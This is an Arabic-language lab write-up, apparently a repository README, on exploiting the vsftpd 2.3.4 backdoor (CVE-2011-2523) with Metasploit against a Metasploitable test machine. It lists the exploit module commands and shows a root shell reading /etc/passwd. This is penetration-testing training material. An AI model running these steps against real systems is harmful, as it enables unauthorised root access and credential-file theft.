
تقييم الثغرات واستغلال vsftpd 2.3.4 (CVE-2011-2523) باستخدام Metasploit. يتضمن التقرير الكامل وإثبات الوصول الجذري.
استغلال ثغرة معروفة في
vsftpd 2.3.4باستخدام Metasploit.
192.168.150.133exploit/unix/ftp/vsftpd_234_backdoorيحتوي vsftpd 2.3.4 على باب خلفي خبيث يفتح قشرة أوامر على المنفذ 6200 عند تلقي اسم مستخدم مصمم خصيصًا (ينتهي بـ :)).
CVE: CVE-2011-2523
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.150.133
run
whoami
> root
id
> uid=0(root) gid=0(root)
hostname
> metasploitable
uname -a
> Linux metasploitable 2.6.24-16-server #1 SMP ...
cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
...
وصول قشرة الجذر يمنح المهاجم سيطرة كاملة على النظام المستهدف — بما في ذلك تصعيد الامتيازات، والحركة الجانبية، وسرقة البيانات، والوصول المستمر.
📝 تقرير PDF كامل متاح في هذا المستودع: vsftpd-exploit-report.pdf
صُنع بـ 🔥 بواسطة vedpakhare